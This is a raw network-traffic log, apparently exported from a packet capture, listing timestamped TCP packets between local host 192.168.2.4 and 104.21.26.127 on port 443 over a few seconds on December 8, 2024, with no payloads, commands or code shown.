                                                                                                                                Dec 8, 2024 01:47:07.893449068 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.898818970 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.898833036 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.898869991 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.898874044 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.898888111 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.898910999 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.903664112 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.903683901 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.903727055 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.903732061 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.903743029 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.903769970 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.909123898 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.909138918 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.909184933 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:07.909189939 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:07.909223080 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.044635057 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.044651031 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.044698954 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.044706106 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.044715881 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.046063900 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.050102949 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.050122023 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.050157070 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.050163031 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.050179005 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.050196886 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.055464983 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.055480003 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.055522919 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.055527925 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.055538893 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.055566072 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.069763899 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.069777966 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.069822073 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.069827080 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.069835901 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.069859982 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.096148968 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.096163034 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.096210003 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.096215010 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.096231937 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.096251965 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.101596117 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.101610899 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.101648092 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.101653099 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.101666927 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.101911068 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.106951952 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.106964111 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.107007027 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.107009888 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.107019901 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.107042074 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.112462997 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.112477064 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.112519979 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.112524986 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.112538099 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.113928080 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.236987114 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.237005949 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.237049103 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.237056971 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.237078905 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.237102032 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.242477894 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.242494106 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.242554903 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.242558956 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.242594004 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.247279882 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.247293949 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.247354031 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.247359037 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.247389078 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.261930943 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.261945009 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.261982918 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.261989117 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.262013912 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.262032986 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.288074017 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.288088083 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.288146973 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.288152933 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.288192034 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.293545008 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.293564081 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.293596029 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.293607950 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.293622971 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.293642998 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.298926115 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.298942089 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.298974037 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.298979998 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.299006939 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.299016953 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.304406881 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.304421902 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.304456949 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.304461002 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.304476023 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.304508924 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.429445982 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.429462910 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.429501057 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.429507971 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.429529905 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.429554939 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.434242964 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.434257984 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.434309006 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.434313059 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.434365034 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.439634085 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.439649105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.439702034 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.439706087 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.439747095 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.454001904 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.454015970 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.454071999 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.454077005 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.454118967 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.480626106 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.480640888 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.480704069 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.480709076 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.480753899 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.485434055 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.485447884 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.485496044 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.485501051 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.485539913 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.490820885 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.490834951 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.490886927 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.490891933 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.490936041 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.496316910 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.496335030 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.496368885 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.496372938 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.496390104 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.496408939 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.621634007 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.621670961 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.621707916 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.621716976 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.621752977 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.621762991 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.626468897 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.626483917 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.626532078 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.626535892 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.626570940 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.631820917 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.631860971 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.631902933 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.631907940 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.631941080 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.631956100 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.646061897 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.646075964 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.646131039 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.646135092 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.646162987 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.672924042 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.672939062 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.672997952 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.673003912 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.673047066 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.677732944 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.677748919 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.677792072 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.677795887 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.677823067 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.677844048 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.683229923 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.683243990 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.683290958 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.683296919 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.683355093 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.688617945 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.688633919 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.688683033 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.688690901 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.688699961 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.688723087 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.813699961 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.813714981 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.813776970 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.813782930 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.813832045 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.818491936 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.818506002 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.818536997 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.818542957 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.818568945 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.818587065 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.823976994 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.823992014 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.824028015 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.824031115 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.824070930 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.824076891 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.838182926 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.838197947 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.838241100 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.838246107 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.838260889 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.838282108 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.864533901 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.864553928 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.864594936 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.864599943 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.864614964 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.864634037 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.870021105 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.870034933 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.870073080 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.870080948 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.870142937 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.875754118 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.875767946 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.875813961 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.875818968 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.875869036 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.880212069 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.880224943 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.880263090 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.880268097 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:08.880289078 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:08.880300999 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.005692005 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.005707026 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.005775928 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.005781889 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.005817890 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.010534048 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.010550022 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.010605097 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.010610104 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.010644913 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.015994072 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.016007900 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.016083956 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.016088963 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.016129971 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.029917002 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.029931068 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.029989004 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.029994011 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.030031919 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.058001995 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.058017015 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.058090925 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.058095932 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.058149099 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.063482046 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.063498974 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.063546896 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.063550949 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.063579082 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.063600063 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.068384886 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.068401098 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.068456888 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.068461895 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.068495989 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.073765039 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.073779106 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.073838949 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.073843956 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.073883057 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.197740078 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.197757006 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.197818995 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.197825909 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.197863102 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.202552080 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.202574968 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.202614069 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.202619076 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.202641010 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.202662945 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.208046913 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.208060980 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.208106041 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.208111048 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.208148956 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.221887112 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.221900940 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.221950054 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.221956015 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.221993923 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.256901979 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.256917953 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.256973028 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.256979942 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.257016897 CET49979443192.168.2.4104.21.26.127
                                                                                                                                Dec 8, 2024 01:47:09.262290955 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.262304068 CET44349979104.21.26.127192.168.2.4
                                                                                                                                Dec 8, 2024 01:47:09.262358904 CET49979443192.168.2.4104.21.26.127
